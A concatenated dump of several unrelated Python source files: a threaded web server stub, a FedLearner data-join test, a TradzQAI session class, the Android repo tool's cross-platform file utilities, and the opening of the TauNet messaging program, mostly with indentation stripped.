def serve_http(https_port=80, HandlerClass = WebHandler):
global SERVER
socketserver.TCPServer.allow_reuse_address = True
httpd = ThreadedTCPServer(("", https_port), HandlerClass)
debug("Serving HTTP on", https_port)
SERVER = httpd
SERVER.serve_forever()
def debug(*args):
print(" ".join(map(str, args)))
def start():
port = int(WEB_PORT)
def run_webserve():
serve_http(port)
web_thread = threading.Thread(target=run_webserve)
web_thread.daemon = True
web_thread.start()
return web_thread
def stop():
SERVER.shutdown()
SERVER.server_close()
def restart():
stop()
start()
def main():
t = start()
import helpers
# TODO: add argument parsing with argparse
helpers.select_embedding()
while True:
t.join(0.5)
        if not t.is_alive():
print("WEBSERVER DIED, EXITING")
break
if __name__ == '__main__':
main()
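# ---------------------------------------------------------------------------
# The handlers above hot-reload a companion `webhandle` module on every
# request; that module is not part of this file.  A hypothetical minimal
# version only needs to expose do_get(handler) and do_post(handler), e.g.:
#
#     def do_get(handler):
#         handler.send_response(200)
#         handler.send_header("Content-Type", "text/plain")
#         handler.end_headers()
#         handler.wfile.write(b"hello\n")
#
#     def do_post(handler):
#         length = int(handler.headers.get("Content-Length", 0))
#         body = handler.rfile.read(length)
#         handler.send_response(200)
#         handler.send_header("Content-Type", "application/octet-stream")
#         handler.end_headers()
#         handler.wfile.write(body)  # echo the request body back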
|
test_data_join_worker.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import os
import threading
from os import listdir
from os.path import isfile, join
import time
import random
import logging
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import unittest
import tensorflow.compat.v1 as tf
tf.enable_eager_execution()
import numpy as np
import tensorflow_io
from tensorflow.compat.v1 import gfile
from google.protobuf import text_format, empty_pb2, timestamp_pb2
import grpc
from fedlearner.common import common_pb2 as common_pb
from fedlearner.common import data_join_service_pb2 as dj_pb
from fedlearner.common import data_join_service_pb2_grpc as dj_grpc
from fedlearner.common.db_client import DBClient
from fedlearner.proxy.channel import make_insecure_channel, ChannelType
from fedlearner.data_join import (
data_block_manager, common,
data_join_master, data_join_worker,
raw_data_visitor, raw_data_publisher
)
from fedlearner.data_join.data_block_manager import DataBlockBuilder
from fedlearner.data_join.raw_data_iter_impl.tf_record_iter import TfExampleItem
class DataJoinWorker(unittest.TestCase):
def setUp(self):
self.kvstore_type = 'etcd'
self.leader_base_dir = 'bytefl_l'
self.follower_base_dir = 'bytefl_f'
data_source_name = 'test_data_source'
os.environ['ETCD_BASE_DIR'] = self.leader_base_dir
kvstore_l = DBClient(self.kvstore_type, True)
os.environ['ETCD_BASE_DIR'] = self.follower_base_dir
kvstore_f = DBClient(self.kvstore_type, True)
kvstore_l.delete_prefix(common.data_source_kvstore_base_dir(data_source_name))
kvstore_f.delete_prefix(common.data_source_kvstore_base_dir(data_source_name))
data_source_l = common_pb.DataSource()
self.raw_data_pub_dir_l = './raw_data_pub_dir_l'
data_source_l.raw_data_sub_dir = self.raw_data_pub_dir_l
data_source_l.role = common_pb.FLRole.Leader
data_source_l.state = common_pb.DataSourceState.Init
data_source_l.output_base_dir = "./ds_output_l"
self.raw_data_dir_l = "./raw_data_l"
data_source_f = common_pb.DataSource()
self.raw_data_pub_dir_f = './raw_data_pub_dir_f'
data_source_f.role = common_pb.FLRole.Follower
data_source_f.raw_data_sub_dir = self.raw_data_pub_dir_f
data_source_f.state = common_pb.DataSourceState.Init
data_source_f.output_base_dir = "./ds_output_f"
self.raw_data_dir_f = "./raw_data_f"
data_source_meta = common_pb.DataSourceMeta()
data_source_meta.name = data_source_name
data_source_meta.partition_num = 2
data_source_meta.start_time = 0
data_source_meta.end_time = 100000000
data_source_l.data_source_meta.MergeFrom(data_source_meta)
common.commit_data_source(kvstore_l, data_source_l)
data_source_f.data_source_meta.MergeFrom(data_source_meta)
common.commit_data_source(kvstore_f, data_source_f)
self.kvstore_l = kvstore_l
self.kvstore_f = kvstore_f
self.data_source_l = data_source_l
self.data_source_f = data_source_f
self.data_source_name = data_source_name
self.raw_data_publisher_l = raw_data_publisher.RawDataPublisher(
self.kvstore_l, self.raw_data_pub_dir_l
)
self.raw_data_publisher_f = raw_data_publisher.RawDataPublisher(
self.kvstore_f, self.raw_data_pub_dir_f
)
if gfile.Exists(data_source_l.output_base_dir):
gfile.DeleteRecursively(data_source_l.output_base_dir)
if gfile.Exists(self.raw_data_dir_l):
gfile.DeleteRecursively(self.raw_data_dir_l)
if gfile.Exists(data_source_f.output_base_dir):
gfile.DeleteRecursively(data_source_f.output_base_dir)
if gfile.Exists(self.raw_data_dir_f):
gfile.DeleteRecursively(self.raw_data_dir_f)
self.worker_options = dj_pb.DataJoinWorkerOptions(
use_mock_etcd=True,
raw_data_options=dj_pb.RawDataOptions(
raw_data_iter='TF_RECORD',
read_ahead_size=1<<20,
read_batch_size=128,
optional_fields=['label']
),
example_id_dump_options=dj_pb.ExampleIdDumpOptions(
example_id_dump_interval=1,
example_id_dump_threshold=1024
),
example_joiner_options=dj_pb.ExampleJoinerOptions(
example_joiner='STREAM_JOINER',
min_matching_window=64,
max_matching_window=256,
data_block_dump_interval=30,
data_block_dump_threshold=1000
),
batch_processor_options=dj_pb.BatchProcessorOptions(
batch_size=512,
max_flying_item=2048
),
data_block_builder_options=dj_pb.WriterOptions(
output_writer='TF_RECORD'
)
)
self.total_index = 1 << 12
def generate_raw_data(self, start_index, kvstore, rdp, data_source, raw_data_base_dir, partition_id,
block_size, shuffle_win_size, feat_key_fmt, feat_val_fmt):
dbm = data_block_manager.DataBlockManager(data_source, partition_id)
raw_data_dir = os.path.join(raw_data_base_dir,
common.partition_repr(partition_id))
if not gfile.Exists(raw_data_dir):
gfile.MakeDirs(raw_data_dir)
useless_index = 0
new_raw_data_fnames = []
for block_index in range(start_index // block_size, (start_index + self.total_index) // block_size):
builder = DataBlockBuilder(
raw_data_base_dir,
data_source.data_source_meta.name,
partition_id, block_index,
dj_pb.WriterOptions(output_writer='TF_RECORD'), None
)
cands = list(range(block_index * block_size, (block_index + 1) * block_size))
start_index = cands[0]
for i in range(len(cands)):
if random.randint(1, 4) > 2:
continue
a = random.randint(i - shuffle_win_size, i + shuffle_win_size)
b = random.randint(i - shuffle_win_size, i + shuffle_win_size)
if a < 0:
a = 0
if a >= len(cands):
a = len(cands) - 1
if b < 0:
b = 0
if b >= len(cands):
b = len(cands) - 1
if (abs(cands[a]-i-start_index) <= shuffle_win_size and
abs(cands[b]-i-start_index) <= shuffle_win_size):
cands[a], cands[b] = cands[b], cands[a]
for example_idx in cands:
feat = {}
example_id = '{}'.format(example_idx).encode()
feat['example_id'] = tf.train.Feature(
bytes_list=tf.train.BytesList(value=[example_id]))
event_time = 150000000 + example_idx
feat['event_time'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[event_time]))
label = random.choice([1, 0])
if random.random() < 0.8:
feat['label'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[label]))
feat[feat_key_fmt.format(example_idx)] = tf.train.Feature(
bytes_list=tf.train.BytesList(
value=[feat_val_fmt.format(example_idx).encode()]))
example = tf.train.Example(features=tf.train.Features(feature=feat))
builder.append_item(TfExampleItem(example.SerializeToString()),
useless_index, useless_index)
useless_index += 1
meta = builder.finish_data_block()
fname = common.encode_data_block_fname(
data_source.data_source_meta.name,
meta
)
new_raw_data_fnames.append(os.path.join(raw_data_dir, fname))
fpaths = [os.path.join(raw_data_dir, f)
for f in gfile.ListDirectory(raw_data_dir)
if not gfile.IsDirectory(os.path.join(raw_data_dir, f))]
for fpath in fpaths:
if fpath.endswith(common.DataBlockMetaSuffix):
gfile.Remove(fpath)
rdp.publish_raw_data(partition_id, new_raw_data_fnames)
def test_all_assembly(self):
for i in range(3):
logging.info('Testing round %d', i + 1)
self._inner_test_round(i*self.total_index)
def _inner_test_round(self, start_index):
for i in range(self.data_source_l.data_source_meta.partition_num):
self.generate_raw_data(
start_index, self.kvstore_l, self.raw_data_publisher_l,
self.data_source_l, self.raw_data_dir_l, i, 2048, 64,
'leader_key_partition_{}'.format(i) + ':{}',
'leader_value_partition_{}'.format(i) + ':{}'
)
self.generate_raw_data(
start_index, self.kvstore_f, self.raw_data_publisher_f,
self.data_source_f, self.raw_data_dir_f, i, 4096, 128,
'follower_key_partition_{}'.format(i) + ':{}',
'follower_value_partition_{}'.format(i) + ':{}'
)
master_addr_l = 'localhost:4061'
master_addr_f = 'localhost:4062'
master_options = dj_pb.DataJoinMasterOptions(use_mock_etcd=True,
batch_mode=True)
os.environ['ETCD_BASE_DIR'] = self.leader_base_dir
master_l = data_join_master.DataJoinMasterService(
int(master_addr_l.split(':')[1]), master_addr_f,
self.data_source_name, self.kvstore_type,
master_options,
)
master_l.start()
os.environ['ETCD_BASE_DIR'] = self.follower_base_dir
master_f = data_join_master.DataJoinMasterService(
int(master_addr_f.split(':')[1]), master_addr_l,
self.data_source_name, self.kvstore_type,
master_options
)
master_f.start()
channel_l = make_insecure_channel(master_addr_l, ChannelType.INTERNAL)
master_client_l = dj_grpc.DataJoinMasterServiceStub(channel_l)
channel_f = make_insecure_channel(master_addr_f, ChannelType.INTERNAL)
master_client_f = dj_grpc.DataJoinMasterServiceStub(channel_f)
while True:
try:
req_l = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_l.data_source_meta
)
req_f = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_f.data_source_meta
)
dss_l = master_client_l.GetDataSourceStatus(req_l)
dss_f = master_client_f.GetDataSourceStatus(req_f)
self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
if dss_l.state == common_pb.DataSourceState.Processing and \
dss_f.state == common_pb.DataSourceState.Processing:
break
except Exception as e:
pass
time.sleep(2)
worker_addr_l = 'localhost:4161'
worker_addr_f = 'localhost:4162'
os.environ['ETCD_BASE_DIR'] = self.leader_base_dir
worker_l = data_join_worker.DataJoinWorkerService(
int(worker_addr_l.split(':')[1]),
worker_addr_f, master_addr_l, 0,
self.kvstore_type, self.worker_options
)
os.environ['ETCD_BASE_DIR'] = self.follower_base_dir
worker_f = data_join_worker.DataJoinWorkerService(
int(worker_addr_f.split(':')[1]),
worker_addr_l, master_addr_f, 0,
self.kvstore_type, self.worker_options
)
th_l = threading.Thread(target=worker_l.run, name='worker_l')
th_f = threading.Thread(target=worker_f.run, name='worker_f')
th_l.start()
th_f.start()
while True:
try:
req_l = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_l.data_source_meta
)
req_f = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_f.data_source_meta
)
dss_l = master_client_l.GetDataSourceStatus(req_l)
dss_f = master_client_f.GetDataSourceStatus(req_f)
self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
if dss_l.state == common_pb.DataSourceState.Ready and \
dss_f.state == common_pb.DataSourceState.Ready:
break
            except Exception as e:
pass
time.sleep(2)
th_l.join()
th_f.join()
master_l.stop()
master_f.stop()
def tearDown(self):
if gfile.Exists(self.data_source_l.output_base_dir):
gfile.DeleteRecursively(self.data_source_l.output_base_dir)
if gfile.Exists(self.raw_data_dir_l):
gfile.DeleteRecursively(self.raw_data_dir_l)
if gfile.Exists(self.data_source_f.output_base_dir):
gfile.DeleteRecursively(self.data_source_f.output_base_dir)
if gfile.Exists(self.raw_data_dir_f):
gfile.DeleteRecursively(self.raw_data_dir_f)
self.kvstore_f.delete_prefix(common.data_source_kvstore_base_dir(self.leader_base_dir))
self.kvstore_l.delete_prefix(common.data_source_kvstore_base_dir(self.follower_base_dir))
if __name__ == '__main__':
unittest.main()
|
local.py
|
from TradzQAI.core import Local_Worker, Local_env
from TradzQAI.core.environnement.base import dataLoader
from TradzQAI.tools import Saver, Logger, red
import time, os
from threading import Thread
class Local_session(Thread):
def __init__(self, mode="train", contract_type="classic", config='config/', db=None, agent="PPO"):
self.db = db
if not "/" in config[len(config)-1]:
raise ValueError("You forget \"/\" at the end, it should be {}/".format(config))
self.env = None
self.mode = mode
self.contract_type = contract_type
self.config = config
self.agent = None
self.worker = None
self.saver = Saver()
self.logger = None
self.dl = None
self.settings = dict()
if self.saver.check_settings_files(config):
self.settings['env'], self.settings['agent'], self.settings['network'] = self.saver.load_settings(config)
self.logger = Logger()
self.dl = dataLoader(directory=self.settings['env']['base']['data_directory'], mode=self.mode)
#self.settings['env']['base'].pop('data_directory')
self.saver._check(self.settings['agent']['type'].split('_')[0].upper(), self.settings)
else:
self.initEnv()
default_env, default_network = self.env.get_default_settings()
self.saver.save_settings(default_env,
getattr(__import__('TradzQAI'), agent).get_specs(),
default_network, config)
Thread.__init__(self)
def stop(self):
self.env.close()
self.logger.stop()
def getWorker(self):
return self.worker
def getEnv(self):
return self.env
def getAgent(self):
return self.agent
def setAgent(self, agent=None, device=None):
if agent:
self.env.model_name = agent
if self.settings['agent']['type'].split('_')[0].upper() in self.src_agents():
import warnings
with warnings.catch_warnings():
warnings.filterwarnings("ignore",category=FutureWarning)
from TradzQAI.agents.agent import Agent
self.agent = Agent
self.device = device
else:
raise ValueError('could not import %s' % self.settings['agent']['type'].split('_')[0].upper())
def loadSession(self):
if not self.env:
self.initEnv()
if not self.env.stop:
self.initAgent()
self.initWorker()
else:
print (red("Warning : ")+"You cannot start the session without setting, "+\
"any data directory in {}environnement".format(self.config))
def src_agents(self):
ignore = ['Agent.py', '__init__.py', '__pycache__']
valid = []
for f in os.listdir("TradzQAI/agents"):
if f not in ignore:
valid.append(f.replace(".py", ""))
return valid
def initAgent(self):
if not self.agent:
self.setAgent()
for classe in self.agent.__mro__:
if ("tensorforce" and self.agent.__name__) in str(classe):
self.agent = self.agent(env=self.env, device=self.device)._get()
return
self.agent = self.agent(env=self.env, device=self.device)._get()
def initWorker(self):
self.worker = Local_Worker(env=self.env, agent=self.agent)
def initEnv(self):
self.env = Local_env(mode=self.mode,
contract_type=self.contract_type, config=self.settings,
logger=self.logger, saver=self.saver, dataloader=self.dl)
def run(self):
if not self.agent:
raise ValueError("add an agent and load the session before running")
elif not self.env.stop:
self.logger.start()
Thread(target=self.worker.run).start()
else:
print (red("Warning : ")+"You cannot start the session without setting, "+\
"any data directory in {}environnement".format(self.config))
self.stop()
|
platform_utils.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import os
import platform
import select
import shutil
import stat
from pyversion import is_python3
if is_python3():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
def isWindows():
""" Returns True when running with the native port of Python for Windows,
False when running on any other platform (including the Cygwin port of
Python).
"""
# Note: The cygwin port of Python returns "CYGWIN_NT_xxx"
return platform.system() == "Windows"
class FileDescriptorStreams(object):
""" Platform agnostic abstraction enabling non-blocking I/O over a
collection of file descriptors. This abstraction is required because
fctnl(os.O_NONBLOCK) is not supported on Windows.
"""
@classmethod
def create(cls):
""" Factory method: instantiates the concrete class according to the
current platform.
"""
if isWindows():
return _FileDescriptorStreamsThreads()
else:
return _FileDescriptorStreamsNonBlocking()
def __init__(self):
self.streams = []
def add(self, fd, dest, std_name):
""" Wraps an existing file descriptor as a stream.
"""
self.streams.append(self._create_stream(fd, dest, std_name))
def remove(self, stream):
""" Removes a stream, when done with it.
"""
self.streams.remove(stream)
@property
def is_done(self):
""" Returns True when all streams have been processed.
"""
return len(self.streams) == 0
def select(self):
""" Returns the set of streams that have data available to read.
The returned streams each expose a read() and a close() method.
When done with a stream, call the remove(stream) method.
"""
raise NotImplementedError
def _create_stream(self, fd, dest, std_name):
""" Creates a new stream wrapping an existing file descriptor.
"""
raise NotImplementedError
class _FileDescriptorStreamsNonBlocking(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that support
non blocking I/O.
"""
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.set_non_blocking()
def set_non_blocking(self):
import fcntl
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self):
return self.fd.read(4096)
def close(self):
self.fd.close()
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name)
def select(self):
ready_streams, _, _ = select.select(self.streams, [], [])
return ready_streams
class _FileDescriptorStreamsThreads(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that don't support
non blocking I/O. This implementation requires creating threads issuing
blocking read operations on file descriptors.
"""
def __init__(self):
super(_FileDescriptorStreamsThreads, self).__init__()
# The queue is shared across all threads so we can simulate the
# behavior of the select() function
self.queue = Queue(10) # Limit incoming data from streams
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name, self.queue)
def select(self):
# Return only one stream at a time, as it is the most straightforward
# thing to do and it is compatible with the select() function.
item = self.queue.get()
stream = item.stream
stream.data = item.data
return [stream]
class QueueItem(object):
""" Item put in the shared queue """
def __init__(self, stream, data):
self.stream = stream
self.data = data
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name, queue):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.queue = queue
self.data = None
self.thread = Thread(target=self.read_to_queue)
self.thread.daemon = True
self.thread.start()
def close(self):
self.fd.close()
def read(self):
data = self.data
self.data = None
return data
def read_to_queue(self):
""" The thread function: reads everything from the file descriptor into
the shared queue and terminates when reaching EOF.
"""
for line in iter(self.fd.readline, b''):
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, line))
self.fd.close()
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, b''))
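# Illustrative sketch, not part of the original module: a minimal drain loop showing the
# intended add/select/read/remove cycle described above. It assumes `proc` is a
# subprocess.Popen started with stdout/stderr pipes; `dest` is passed through unused here.
def _example_drain_process_output(proc):
    streams = FileDescriptorStreams.create()
    streams.add(proc.stdout, dest=None, std_name='stdout')
    streams.add(proc.stderr, dest=None, std_name='stderr')
    while not streams.is_done:
        for stream in streams.select():
            data = stream.read()
            if not data:
                # EOF on this stream: close it and stop tracking it
                stream.close()
                streams.remove(stream)
            else:
                print(stream.std_name, data)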
def symlink(source, link_name):
"""Creates a symbolic link pointing to source named link_name.
Note: On Windows, source must exist on disk, as the implementation needs
to know whether to create a "File" or a "Directory" symbolic link.
"""
if isWindows():
import platform_utils_win32
source = _validate_winpath(source)
link_name = _validate_winpath(link_name)
target = os.path.join(os.path.dirname(link_name), source)
if isdir(target):
platform_utils_win32.create_dirsymlink(_makelongpath(source), link_name)
else:
platform_utils_win32.create_filesymlink(_makelongpath(source), link_name)
else:
return os.symlink(source, link_name)
def _validate_winpath(path):
path = os.path.normpath(path)
if _winpath_is_valid(path):
return path
raise ValueError("Path \"%s\" must be a relative path or an absolute "
"path starting with a drive letter".format(path))
def _winpath_is_valid(path):
"""Windows only: returns True if path is relative (e.g. ".\\foo") or is
absolute including a drive letter (e.g. "c:\\foo"). Returns False if path
is ambiguous (e.g. "x:foo" or "\\foo").
"""
assert isWindows()
path = os.path.normpath(path)
drive, tail = os.path.splitdrive(path)
if tail:
if not drive:
return tail[0] != os.sep # "\\foo" is invalid
else:
return tail[0] == os.sep # "x:foo" is invalid
else:
return not drive # "x:" is invalid
def _makelongpath(path):
"""Return the input path normalized to support the Windows long path syntax
("\\\\?\\" prefix) if needed, i.e. if the input path is longer than the
MAX_PATH limit.
"""
if isWindows():
# Note: MAX_PATH is 260, but, for directories, the maximum value is actually 246.
if len(path) < 246:
return path
if path.startswith(u"\\\\?\\"):
return path
if not os.path.isabs(path):
return path
# Append prefix and ensure unicode so that the special longpath syntax
# is supported by underlying Win32 API calls
return u"\\\\?\\" + os.path.normpath(path)
else:
return path
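# Hypothetical self-check, not part of the original module: on Windows, absolute paths
# longer than the 246-character directory limit gain the "\\?\" long-path prefix, while
# short, relative or already-prefixed paths are returned unchanged.
def _example_makelongpath():
    long_dir = "C:\\" + "\\".join(["sub"] * 80)   # well over 246 characters
    assert _makelongpath(long_dir).startswith(u"\\\\?\\") or not isWindows()
    assert _makelongpath("C:\\short") == "C:\\short"   # short paths pass through untouched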
def rmtree(path, ignore_errors=False):
"""shutil.rmtree(path) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
onerror = None
if isWindows():
path = _makelongpath(path)
onerror = handle_rmtree_error
shutil.rmtree(path, ignore_errors=ignore_errors, onerror=onerror)
def handle_rmtree_error(function, path, excinfo):
# Allow deleting read-only files
os.chmod(path, stat.S_IWRITE)
function(path)
def rename(src, dst):
"""os.rename(src, dst) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
# On Windows, rename fails if destination exists, see
# https://docs.python.org/2/library/os.html#os.rename
try:
os.rename(_makelongpath(src), _makelongpath(dst))
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(_makelongpath(dst))
os.rename(_makelongpath(src), _makelongpath(dst))
else:
raise
else:
os.rename(src, dst)
def remove(path):
"""Remove (delete) the file path. This is a replacement for os.remove that
allows deleting read-only files on Windows, with support for long paths and
for deleting directory symbolic links.
Availability: Unix, Windows."""
if isWindows():
longpath = _makelongpath(path)
try:
os.remove(longpath)
except OSError as e:
if e.errno == errno.EACCES:
os.chmod(longpath, stat.S_IWRITE)
# Directory symbolic links must be deleted with 'rmdir'.
if islink(longpath) and isdir(longpath):
os.rmdir(longpath)
else:
os.remove(longpath)
else:
raise
else:
os.remove(path)
def walk(top, topdown=True, onerror=None, followlinks=False):
"""os.walk(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
return _walk_windows_impl(top, topdown, onerror, followlinks)
else:
return os.walk(top, topdown, onerror, followlinks)
def _walk_windows_impl(top, topdown, onerror, followlinks):
try:
names = listdir(top)
except Exception as err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(os.path.join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
if followlinks or not islink(new_path):
for x in _walk_windows_impl(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def listdir(path):
"""os.listdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.listdir(_makelongpath(path))
def rmdir(path):
"""os.rmdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
os.rmdir(_makelongpath(path))
def isdir(path):
"""os.path.isdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.path.isdir(_makelongpath(path))
def islink(path):
"""os.path.islink(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.islink(_makelongpath(path))
else:
return os.path.islink(path)
def readlink(path):
"""Return a string representing the path to which the symbolic link
points. The result may be either an absolute or relative pathname;
if it is relative, it may be converted to an absolute pathname using
os.path.join(os.path.dirname(path), result).
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.readlink(_makelongpath(path))
else:
return os.readlink(path)
def realpath(path):
"""Return the canonical path of the specified filename, eliminating
any symbolic links encountered in the path.
Availability: Windows, Unix.
"""
if isWindows():
current_path = os.path.abspath(path)
path_tail = []
for c in range(0, 100): # Avoid cycles
if islink(current_path):
target = readlink(current_path)
current_path = os.path.join(os.path.dirname(current_path), target)
else:
basename = os.path.basename(current_path)
if basename == '':
path_tail.append(current_path)
break
path_tail.append(basename)
current_path = os.path.dirname(current_path)
path_tail.reverse()
result = os.path.normpath(os.path.join(*path_tail))
return result
else:
return os.path.realpath(path)
|
main.py
|
# Copyright (c) 2015 Gregory Gaston
# License: https://opensource.org/licenses/MIT
# This file contains the main() function for the TauNet system as
# well as many of the basic functions involved with sending messages,
# receiving messages, and the program interface.
# Built in libraries
import socket, threading, time, os
# my libraries
import protocol, saber, messages, user_func
# <<<< <<<< <<<< Globals Variable >>>> >>>> >>>> #
port = 6283
myip = socket.gethostbyname(socket.gethostname())
my_user_name = ''
TauNet_version = '1.0'
protocol_version = '0.2'
filename = ''
input_message = '' #Global variable
TIMEOUT = 8
MAX_MESSAGE_LENGTH = 600
key = ''
# <<<< <<<< <<<< MESSAGING FUNCTIONS >>>> >>>> >>>> #
# Functions dealing with the sending and receiving of messages.
# Sends a message based on the user_info
def send_message(user_info, my_info, message, key):
# Package
pay = protocol.write_message(user_info, my_info, message, protocol_version)
# Encrypt
enc_pay = saber.encrypt(pay.encode(), 20, key)
# Convert to string
str_enc_pay = ''
for i in range(len(enc_pay)):
str_enc_pay = str_enc_pay + chr(enc_pay[i])
# Send payload
s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
s.settimeout(TIMEOUT)
s.connect((user_info[1], port)) # connect() takes tuple (user_ip, port#)
assert s
s.send(str_enc_pay.encode()) #encode converts message to bin
s.shutdown(1)
s.close()
return
# Listens for incoming messages
# Run as a separate thread
def listen(user_list, message_hist):
s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
assert s
s.bind(('', 6283))
while 1:
s.listen(1)
assert s
(conn , addr) = s.accept()
mess = conn.recv(1024).decode() #decode converts from bin to string
#Hangs until a message is received
assert mess
## FORK HERE TO DECODE WHILE STILL BEING ABLE TO ACCEPT A NEW MESSAGE
#convert to list
mess_list = [ord(mess[i]) for i in range(len(mess))]
# decrypt
dec_mess = saber.decrypt(mess_list, 20, user_list.key)
# convert to string
message = ''
for i in range(len(dec_mess)):
message = message + chr(dec_mess[i])
rec_mess = protocol.read_message(message) #piece out message
assert rec_mess
if not rec_mess or rec_mess[2] == '' or rec_mess[2] == '\n': ##Empty message received
None
elif(user_list.search_users(rec_mess[0][0])):
print('\n' + rec_mess[0][0] + ':\t' + rec_mess[2] + '\n' + input_message, end = '')
message_hist.add_message(rec_mess[0][0], rec_mess[1][0], rec_mess[2])
else:
#Send error message
print('\n<<Message recieved from unknon user and discarded>>\n' + input_message, end = '')
return
# <<<< <<<< <<<< COMMAND FUNCTIONS >>>> >>>> >>>> #
# This section contains functions pertaining to the different
# commands that are accepted by the TauNet command prompt.
# Breaks a command into its pieces
def read_command(command):
if not command:
return None
length = len(command)
i = 1
part1 = part2 = None
while i < length and command[i] != ' ':
i = i + 1
part1 = command[1:i]
part2 = command[i+1:length]
return (part1, part2)
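# Illustrative sketch, not part of the original program: read_command drops the leading
# command character and splits on the first space, for example:
def _example_read_command():
    assert read_command("@alice hello there") == ("alice", "hello there")
    assert read_command("+bob 10.0.0.5") == ("bob", "10.0.0.5")
    assert read_command("") is None        # empty input yields None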
#@user message
def at(user_info, message):
message_end = None
while message:
if len(message) > MAX_MESSAGE_LENGTH:
message_end = message[MAX_MESSAGE_LENGTH:]
message = message[:MAX_MESSAGE_LENGTH]
else:
message_end = None
resend = True
while resend:
try:
send_message(user_info, (my_user_name, myip), message, key)
except:# TimeoutError:
if input("Error:\n * Unable to send message to " + user_info[0] + ". Attempt to resend message? (y/n) " ) == 'n':
resend = False
else:
resend = False
message = message_end
time.sleep(0.1) #make sure we don't overload someone else's receiver
return None
# Help menu
def help_menu():
print(" Command | Description")
print(" ----------------------+-------------------------------------------------------")
print(" ? | Displays this dialogue")
print(" @user_name Message | Sends 'user_name' 'Message'")
print(" @ Message | Sends 'Message' to the last 'user_name' messaged")
print(" +user_name ip_address | Adds 'user_name' to the list of users at 'ip_address.'")
print(" -user_name | Remove 'user_name' from the list of users.")
print(" #n | Displays the last 'n' messages from 1 to 20")
print(" | if n is not specified prints the last message")
# print(" #user_name n | Displays the last 'n' messages (to and) from user_name")
print(" ~ | Displays all networked users and their address")
# print(" ~user_name | Displays user_name's information")
print(" !CLEAR | Clear the Screen")
print(" !EXIT | Exit the program")
print(" ----------------------+-------------------------------------------------------")
return None
# Clear the display:
def clear():
try:
if os.name == 'nt':
clear = os.system('cls')
else:
clear = os.system('clear')
except: None
return None
# <<<< <<<< <<<< MAIN >>>> >>>> >>>> #
# The main execution branch for TauNet.
def main(LMT= False):
# Declare globals that will be set
global my_user_name, key, filename, input_message
# LONG MESSAGE TESTING:
if LMT:
assert open("test_file.txt")
user_list = user_func.u_list("test_file.txt")
message_hist = messages.message_list()
my_user_name = user_list.me
key = user_list.key
user_info = old_user = None
listen_thread = threading.Thread(target=listen, args = (user_list, message_hist,))
listen_thread.daemon = True
listen_thread.start()
message = ''
l = int(input("Message Max Length == " + str(MAX_MESSAGE_LENGTH) +"\nLength of string to send: "))
n = int(input("Number of times to send full message: "))
for i in range(l):
message = message + str(i%10)
for i in range(n):
at(('user1', '127.0.0.1'), message)
return None
# END LONG MESSAGE TESTING
# Main proper
print(" _ __ __ ____ ____ \n" +
" _____ ___ __ __/ | / /__ / /_ _ __ \ // __ \ \n" +
" / __/ __ `/ / / / |/ / _ \/ __/ | | / / / // / / / \n" +
" / /_/ /_/ / /_/ / /| / __/ /_ | |/ / / // /_/ / \n" +
" \__/\__,_/\__,_/_/ |_/\___/\__/ |___/ /_(_)____/ \n" +
"\n")
